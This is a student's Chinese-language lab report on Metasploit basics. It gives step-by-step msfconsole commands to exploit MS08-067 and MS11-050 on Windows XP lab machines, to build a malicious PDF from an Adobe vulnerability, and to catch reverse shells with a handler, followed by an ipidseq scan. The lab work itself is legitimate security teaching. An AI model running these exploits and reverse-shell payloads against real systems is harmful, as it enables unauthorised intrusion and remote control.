20155338 《网络攻防》Exp5 MSF基础应用
基础问题回答
1、 用自己的话解释什么是exploit,payload,encode?
- exploit将真正要负责攻击的代码传送到靶机中,相当于载具
- payload负责执行相应的攻击代码,相当于载荷
- encode是伪装,为了避免payload中坏字符影响功能,相当于编码
实验过程
Windows服务渗透攻击——MS08-067安全漏洞
-
攻击机:kali,ip:172.30.6.185
-
靶机:windows XP SP3,IP地址是172.30.7.99
-
先
msfconsole
进入msf,再用search ms08_067
查询一下针对该漏洞的攻击模块:
-
用
use exploit/windows/smb/ms08_067_netapi
使用该模块,并用show targets
查看可以被攻击的靶机的操作系统型号:
-
用
show payloads
查看可以供我们使用的攻击载:
-
从中找到一个可用的攻击载荷
generic/shell_reverse_tcp
,用set payload generic/shell_reverse_tcp
设置payload:
- 用
show options
查看需要设置的参数:
- 这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置,并设置target选项目标(例如我攻击系统为WIN xp 中文简体 SP3,所以选择34)
- 用
show options
确认需要设置的参数是否已经设置好:
- 确认参数设置无误后,用exploit指令开始攻击:
- 攻击成功后会获取靶机的shell,可以对其进行操作:
针对浏览器的攻击:ms11_050
- 用
search ms11_050
查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement
使用该模块:
- 用info查看该模块的相关信息
- targets信息:
- options信息:
- 用
set payload windows/meterpreter/reverse_tcp
设置payload,并设置需要设置的参数。
- 用
show options
确认需要设置的参数是否已经设置好:
- 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:
- 在靶机IE上输入该网址:
- kali中显示session已经创建,输入sessions -i 1,获取靶机的shell,可以对其进行操作
针对客户端的攻击:adobe_toolbutton
- 用
search adobe
查询一下针对该漏洞的攻击模块:
- 选择一个模块并使用该模块:
- 用
show targets
查看可以被攻击的靶机的操作系统型号:
- 设置payload攻击载荷,命令
set payload windows/meterpreter/reverse_tcp
,设置相应参数,实施exploit攻击,发现在/root/.msf4/local/
目录下成功生成了一个csj5338.pdf文件:
- 将pdf文件粘贴到靶机win XP
- 在kali中和前几次实验一样打开并设置监听模块
use exploit/multi/handler
,set payload windows/meterpreter/reverse_tcp
,再设置IP以及端口
- 在靶机上打开刚刚那个pdf文件,可以观察到Kali成功获取了靶机的shell,可以对其进行操作:
应用一个辅助模块:ipidseq
- 用
show auxiliary
查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq
:
- 查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。
- 也可以对指定网段的主机进行扫描:
实验总结和收获
这次实验总体流程不算难,但在虚拟机上面我换了很多个,换了几个镜像,总算是用简体中文版成功了,学会了MSF工具的一些常用指令,也认识到在实际的渗透过程中,我们不能完全依靠msf来实现,漏洞也都是很早之前的漏洞,其实在现实生活中中攻击一台计算机还是有一定难度的。还是应该深入学习,加强自己的专业技能。